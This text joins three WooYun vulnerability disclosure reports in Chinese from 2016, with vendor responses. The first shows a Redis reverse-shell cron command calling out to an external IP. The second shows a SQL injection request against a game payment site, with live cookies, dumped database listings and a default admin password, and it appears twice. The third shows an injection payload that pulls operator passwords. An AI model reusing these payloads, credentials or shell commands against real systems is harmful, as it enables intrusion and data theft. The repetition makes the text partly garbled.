漏洞详情披露状态： 2016-05-03： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述：穷游网某服务未授权访问(可远程SHELL)详细说明：#1 漏洞参考WooYun: 新浪微博某服务器控制不当(可远程SHELL) #2 redis服务对外开放redis://115.182.69.199:3000#3 可以管理 slavecode 区域# Keyspace db0:keys=65454963,expires=130654,avg_ttl=30413755756code 区域# Replication role:master connected_slaves:1 slave0:ip=10.1.1.15,port=6379,state=online,offset=271341594993,lag=1 master_repl_offset:271341599570code 区域config get dir 94) "/u01/redis/data" 漏洞证明：650万条key，不敢执行flush命令测试损坏数据，仅仅证明#漏洞利用，创建一个任务计划，执行命令code 区域echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -h 115.182.69.199 -p 3000 -x set 0 config set dir /var/spool/cron/ config set dbfilename root 修复方案：# 设置访问控制版权声明：转载请注明来源 猪猪侠@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：6确认时间：2016-05-03 14:06厂商回复：正在处理，谢谢关注穷游！最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：RT详细说明： code 区域post注入语法：sqlmap.py -r 1.txt --dbs 注入参数sid ====================post数据包======================= POST /index.php?c=pay&a=testgamerole HTTP/1.1 Host: wan.40407.com Proxy-Connection: keep-alive Content-Length: 36 Accept: */* Origin: http://wan.40407.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://wan.40407.com/index.php?c=pay&pt=pt Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D username=heise123&gid=5&sid=32&isyk=数据库信息code 区域available databases [25]: [*] `14x` [*] `399wantg` [*] `40407box_test` [*] `40407box` [*] `40407boxpt_test` [*] `40407boxpt` [*] `40407boxstat` [*] `40407data` [*] `40407kfz` [*] `40407lol` [*] `40407tqyt` [*] `dkwdv{` [*] `kp.ya58.cn` [*] `s}\x1a!\x03!` [*] `ucentir)\x11` [*] `xiro7!` [*] bcgua [*] information_schema [*] mysql [*] percona [*] performance_schema [*] projeit [*] smweb [*] testcy [*] tuan当前库表信息code 区域Database: 40407boxpt +----------------------+---------+ | Table | Entries | +----------------------+---------+ | box_game_tg_data | 761184 | | box_game_member | 450339 | | box_gamecard_sn | 280019 | | box_pay | 22280 | | box_score_record | 4632 | | box_score_playinfo | 4016 | | box_member_mac | 3041 | | box_content_1 | 2220 | | box_content_1_extend | 1900 | | box_score_rule | 1306 | | box_pk_username | 1074 | | box_game_server | 650 | | box_content_1_item | 576 | | box_jf_pay | 479 | | box_tag | 236 | | box_admin_user | 227 | | box_score_game | 160 | | box_content_1_sjsg | 139 | | box_score_pay | 139 | | box_category | 131 | | box_content_1_jjsg | 125 | | box_content_1_sjtl | 90 | | box_content_1_hero | 67 | | box_content_1_zwx | 67 | | box_content_1_nslm | 55 | | box_model | 35 | | box_model_field | 35 | | box_game | 34 | | box_content_1_rxsg2 | 32 | | box_content_1_jyjh | 29 | | box_content_1_ocean | 26 | | box_content_1_hwsg | 25 | | box_content_1_mycs | 25 | | box_user_tg | 24 | | box_pay_cycle | 23 | | box_linkage | 18 | | box_ad | 16 | | box_content_1_jyjx | 16 | | box_pk_game | 13 | | box_pk_number | 13 | | box_content | 12 | | box_gid_modelid | 10 | | box_pingtaibi_fanli | 10 | | box_pk_rule | 10 | | box_content_1_bztx | 8 | | box_plugin | 6 | | box_content_1_smzt | 5 | | box_member_group | 5 | | box_admin_group | 4 | | box_content_1_jz | 4 | | box_content_1_rxsg | 4 | | box_role | 4 | | box_content_1_mjll | 3 | | box_wan_top_gg | 3 | | box_content_1_dsg | 2 | | box_content_1_game | 2 | | box_content_1_swydn | 2 | | box_content_1_xbjz | 2 | +----------------------+---------+ ------------------------------------- Database: 40407boxpt 45w用户信息 +-----------------+---------+ | Table | Entries | +-----------------+---------+ | box_game_member | 450339 | +-----------------+---------+ 20多万估计卡密信息吧 70多w什么信息的 支付信息等由于是延迟注入这里就不跑数据信息证明了======================================================================code 区域http://tg.40407.com/admin/mainindex/index admin 123456 进入可以修改游戏的推广信息啦一些用户信息漏洞证明： code 区域post注入语法：sqlmap.py -r 1.txt --dbs 注入参数sid ====================post数据包======================= POST /index.php?c=pay&a=testgamerole HTTP/1.1 Host: wan.40407.com Proxy-Connection: keep-alive Content-Length: 36 Accept: */* Origin: http://wan.40407.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://wan.40407.com/index.php?c=pay&pt=pt Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D username=heise123&gid=5&sid=32&isyk=数据库信息code 区域available databases [25]: [*] `14x` [*] `399wantg` [*] `40407box_test` [*] `40407box` [*] `40407boxpt_test` [*] `40407boxpt` [*] `40407boxstat` [*] `40407data` [*] `40407kfz` [*] `40407lol` [*] `40407tqyt` [*] `dkwdv{` [*] `kp.ya58.cn` [*] `s}\x1a!\x03!` [*] `ucentir)\x11` [*] `xiro7!` [*] bcgua [*] information_schema [*] mysql [*] percona [*] performance_schema [*] projeit [*] smweb [*] testcy [*] tuan当前库表信息code 区域Database: 40407boxpt +----------------------+---------+ | Table | Entries | +----------------------+---------+ | box_game_tg_data | 761184 | | box_game_member | 450339 | | box_gamecard_sn | 280019 | | box_pay | 22280 | | box_score_record | 4632 | | box_score_playinfo | 4016 | | box_member_mac | 3041 | | box_content_1 | 2220 | | box_content_1_extend | 1900 | | box_score_rule | 1306 | | box_pk_username | 1074 | | box_game_server | 650 | | box_content_1_item | 576 | | box_jf_pay | 479 | | box_tag | 236 | | box_admin_user | 227 | | box_score_game | 160 | | box_content_1_sjsg | 139 | | box_score_pay | 139 | | box_category | 131 | | box_content_1_jjsg | 125 | | box_content_1_sjtl | 90 | | box_content_1_hero | 67 | | box_content_1_zwx | 67 | | box_content_1_nslm | 55 | | box_model | 35 | | box_model_field | 35 | | box_game | 34 | | box_content_1_rxsg2 | 32 | | box_content_1_jyjh | 29 | | box_content_1_ocean | 26 | | box_content_1_hwsg | 25 | | box_content_1_mycs | 25 | | box_user_tg | 24 | | box_pay_cycle | 23 | | box_linkage | 18 | | box_ad | 16 | | box_content_1_jyjx | 16 | | box_pk_game | 13 | | box_pk_number | 13 | | box_content | 12 | | box_gid_modelid | 10 | | box_pingtaibi_fanli | 10 | | box_pk_rule | 10 | | box_content_1_bztx | 8 | | box_plugin | 6 | | box_content_1_smzt | 5 | | box_member_group | 5 | | box_admin_group | 4 | | box_content_1_jz | 4 | | box_content_1_rxsg | 4 | | box_role | 4 | | box_content_1_mjll | 3 | | box_wan_top_gg | 3 | | box_content_1_dsg | 2 | | box_content_1_game | 2 | | box_content_1_swydn | 2 | | box_content_1_xbjz | 2 | +----------------------+---------+ ------------------------------------- Database: 40407boxpt 45w用户信息 +-----------------+---------+ | Table | Entries | +-----------------+---------+ | box_game_member | 450339 | +-----------------+---------+ 20多万估计卡密信息吧 70多w什么信息的 支付信息等由于是延迟注入这里就不跑数据信息证明了======================================================================code 区域http://tg.40407.com/admin/mainindex/index admin 123456 进入可以修改游戏的推广信息啦一些用户信息修复方案：过滤 加强密码版权声明：转载请注明来源 黑色键盘丶@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-28 10:54厂商回复：谢谢，参数过滤的还是要加强处理，平台没上线内部测试结果没修改密码……最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：又来了 赶紧刷个分 心动了 好几十块钱呢。详细说明：http://wooyun.org/bugs/wooyun-2016-0177871 今天看漏洞 提醒公开了 各种大厂商啊、code 区域POST /live800/sta/export/referrerSta.jsp HTTP/1.1 Host: live800.wan.renren.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 184 export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-02-21&toTime=2016-02-22&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator)后台在内网 所以就没在尝试了code 区域  漏洞证明： </code> 修复方案：修复。版权声明：转载请注明来源 whynot@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：6确认时间：2016-04-28 11:04厂商回复：感谢最新状态：暂无